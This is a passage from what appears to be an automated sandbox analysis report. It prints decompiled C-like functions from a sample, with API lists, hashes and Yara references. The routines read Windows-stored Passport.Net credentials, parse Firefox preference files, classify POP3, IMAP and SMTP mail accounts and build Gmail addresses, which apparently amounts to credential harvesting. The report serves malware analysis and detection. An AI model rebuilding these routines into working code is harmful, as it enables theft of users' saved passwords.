                                                                                • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                                0x0040606a
                                                                                0x0040606f
                                                                                0x00406071
                                                                                0x00406079
                                                                                0x00406084
                                                                                0x00406084
                                                                                0x00406093
                                                                                0x00406097
                                                                                0x004060a3
                                                                                0x004060ac
                                                                                0x004060b5
                                                                                0x004060bf
                                                                                0x004060c1
                                                                                0x004060c1
                                                                                0x004060c4
                                                                                0x004060c5
                                                                                0x004060cf

                                                                                APIs
                                                                                • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                • strlen.MSVCRT ref: 0040607E
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                • GlobalLock.KERNEL32 ref: 0040609A
                                                                                • memcpy.MSVCRT ref: 004060A3
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 004060B5
                                                                                • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 3116012682-0
                                                                                • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                                0x0040c54b
                                                                                0x0040c551
                                                                                0x0040c55f
                                                                                0x0040c565
                                                                                0x0040c573
                                                                                0x0040c579
                                                                                0x0040c581
                                                                                0x0040c587
                                                                                0x0040c596
                                                                                0x0040c59c
                                                                                0x0040c59f
                                                                                0x0040c5a8
                                                                                0x0040c5af
                                                                                0x0040c5bc
                                                                                0x0040c5c3
                                                                                0x0040c5c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c5cf
                                                                                0x0040c5d2
                                                                                0x0040c5df
                                                                                0x0040c5df
                                                                                0x0040c5e4
                                                                                0x0040c5e7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c5fe
                                                                                0x0040c600
                                                                                0x0040c610
                                                                                0x0040c61b
                                                                                0x0040c661
                                                                                0x0040c664
                                                                                0x0040c669
                                                                                0x0040c66e
                                                                                0x0040c671
                                                                                0x0040c675
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c677
                                                                                0x0040c689
                                                                                0x0040c68e
                                                                                0x0040c696
                                                                                0x0040c69d
                                                                                0x0040c6a6
                                                                                0x0040c6ab
                                                                                0x0040c6b0
                                                                                0x0040c6c1
                                                                                0x0040c6c9
                                                                                0x0040c6cd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c6cd
                                                                                0x0040c61d
                                                                                0x0040c62a
                                                                                0x0040c62d
                                                                                0x0040c62e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c634
                                                                                0x0040c646
                                                                                0x0040c64b
                                                                                0x0040c653
                                                                                0x00000000
                                                                                0x0040c6cf
                                                                                0x0040c6dd
                                                                                0x0040c6e5
                                                                                0x00000000
                                                                                0x0040c6ec
                                                                                0x0040c6f0

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                • String ID: user_pref("
                                                                                • API String ID: 765841271-2487180061
                                                                                • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                                0x004055ab
                                                                                0x004055b6
                                                                                0x004055cc
                                                                                0x004055cf
                                                                                0x004055dc
                                                                                0x004055de
                                                                                0x004055ea
                                                                                0x004055ee
                                                                                0x004055f3
                                                                                0x004055f4
                                                                                0x004055f5
                                                                                0x004055ff
                                                                                0x00405600
                                                                                0x00405605
                                                                                0x00405608
                                                                                0x0040560d
                                                                                0x00405612
                                                                                0x00405615
                                                                                0x00405618
                                                                                0x0040561b
                                                                                0x004056f5
                                                                                0x004056f7
                                                                                0x004056fd
                                                                                0x00405712
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405621
                                                                                0x00405621
                                                                                0x00405621
                                                                                0x00405624
                                                                                0x00405627
                                                                                0x0040562d
                                                                                0x00405638
                                                                                0x0040564c
                                                                                0x00405652
                                                                                0x00405660
                                                                                0x00405669
                                                                                0x00405673
                                                                                0x00405680
                                                                                0x0040568b
                                                                                0x0040568d
                                                                                0x00405696
                                                                                0x00405697
                                                                                0x0040569c
                                                                                0x0040569d
                                                                                0x004056a5
                                                                                0x004056a7
                                                                                0x004056b9
                                                                                0x004056be
                                                                                0x004056c3
                                                                                0x004056d3
                                                                                0x004056d3
                                                                                0x004056c3
                                                                                0x0040568b
                                                                                0x004056d6
                                                                                0x004056d9
                                                                                0x004056dc
                                                                                0x004056e0
                                                                                0x004056e9
                                                                                0x004056ec
                                                                                0x00000000

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}























                                                                                0x0040d5db
                                                                                0x0040d5ec
                                                                                0x0040d5ee
                                                                                0x0040d5f6
                                                                                0x0040d5f9
                                                                                0x0040d5fc
                                                                                0x0040d601
                                                                                0x0040d603
                                                                                0x0040d619
                                                                                0x0040d61a
                                                                                0x0040d61b
                                                                                0x0040d61d
                                                                                0x0040d627
                                                                                0x0040d62d
                                                                                0x0040d633
                                                                                0x0040d645
                                                                                0x0040d64d
                                                                                0x0040d650
                                                                                0x0040d652
                                                                                0x0040d653
                                                                                0x0040d653
                                                                                0x0040d65e
                                                                                0x0040d666
                                                                                0x0040d667
                                                                                0x0040d67d
                                                                                0x0040d680
                                                                                0x0040d68e
                                                                                0x0040d6af
                                                                                0x0040d6c8
                                                                                0x0040d6d1
                                                                                0x0040d6d1
                                                                                0x0040d6d5
                                                                                0x0040d6d5
                                                                                0x0040d6db
                                                                                0x0040d6db
                                                                                0x0040d6df
                                                                                0x0040d6df
                                                                                0x0040d627
                                                                                0x0040d6e5
                                                                                0x0040d6f0
                                                                                0x0040d6fa

                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                • strlen.MSVCRT ref: 0040D6B7
                                                                                • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                • String ID: Passport.Net\*$hwA
                                                                                • API String ID: 3335197805-2625321100
                                                                                • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 41%
                                                                                			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                                0x00407efb
                                                                                0x00407efe
                                                                                0x00407f06
                                                                                0x00407f10
                                                                                0x00407f18
                                                                                0x00407f1c
                                                                                0x00407f20
                                                                                0x00407fe5
                                                                                0x00407fea
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407f26
                                                                                0x00407f26
                                                                                0x00407f31
                                                                                0x00407f36
                                                                                0x00407f3d
                                                                                0x00407f4c
                                                                                0x00407f54
                                                                                0x00407f5c
                                                                                0x00407f64
                                                                                0x00407f68
                                                                                0x00407f6c
                                                                                0x00407f74
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407f7a
                                                                                0x00407fc4
                                                                                0x00407fc4
                                                                                0x00407fc8
                                                                                0x00407fca
                                                                                0x00407fcb
                                                                                0x00407fcf
                                                                                0x00407fd2
                                                                                0x00407fd7
                                                                                0x00407fd7
                                                                                0x00000000
                                                                                0x00407fc8
                                                                                0x00407f83
                                                                                0x00407f8c
                                                                                0x00407f8e
                                                                                0x00407f8e
                                                                                0x00407f94
                                                                                0x00407f98
                                                                                0x00407f9d
                                                                                0x00407fa7
                                                                                0x00407fb2
                                                                                0x00407fb2
                                                                                0x00407f9f
                                                                                0x00407f9f
                                                                                0x00407f9f
                                                                                0x00407f9f
                                                                                0x00407f9d
                                                                                0x00407fbd
                                                                                0x00407fc3
                                                                                0x00000000
                                                                                0x00407fda
                                                                                0x00407fda
                                                                                0x00407fdb
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2300387033-3849865405
                                                                                • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 66%
                                                                                			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                                0x004044da
                                                                                0x004044e6
                                                                                0x004044ee
                                                                                0x004044f1
                                                                                0x004044fc
                                                                                0x004044ff
                                                                                0x0040450b
                                                                                0x0040450e
                                                                                0x00404515
                                                                                0x00404527
                                                                                0x00404536
                                                                                0x00404548
                                                                                0x0040455a
                                                                                0x0040455f
                                                                                0x00404565
                                                                                0x0040456a
                                                                                0x0040456b
                                                                                0x00404575
                                                                                0x00404583
                                                                                0x00404588
                                                                                0x00404589
                                                                                0x00404592
                                                                                0x004045a0
                                                                                0x004045a5
                                                                                0x004045a6
                                                                                0x004045af
                                                                                0x004045b1
                                                                                0x004045b1
                                                                                0x00404594
                                                                                0x00404594
                                                                                0x00404594
                                                                                0x00404577
                                                                                0x00404577
                                                                                0x00404577
                                                                                0x004045c1
                                                                                0x004045ca
                                                                                0x004045e5

                                                                                APIs
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp$memcpystrlen
                                                                                • String ID: imap$pop3$smtp
                                                                                • API String ID: 445763297-821077329
                                                                                • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                                0x004036cc
                                                                                0x004036cc
                                                                                0x004036dc
                                                                                0x004037ae
                                                                                0x004037ae
                                                                                0x004036ed
                                                                                0x004036f0
                                                                                0x004036f7
                                                                                0x00403702
                                                                                0x00403706
                                                                                0x0040370b
                                                                                0x00403711
                                                                                0x0040371e
                                                                                0x00403721
                                                                                0x0040372f
                                                                                0x0040373f
                                                                                0x0040374b
                                                                                0x00403755
                                                                                0x0040376e
                                                                                0x00403783
                                                                                0x00403788
                                                                                0x00403799
                                                                                0x004037a7
                                                                                0x004037a7
                                                                                0x00403711
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                  • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                  • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                  • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                • strchr.MSVCRT ref: 00403706
                                                                                • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                • strlen.MSVCRT ref: 0040375F
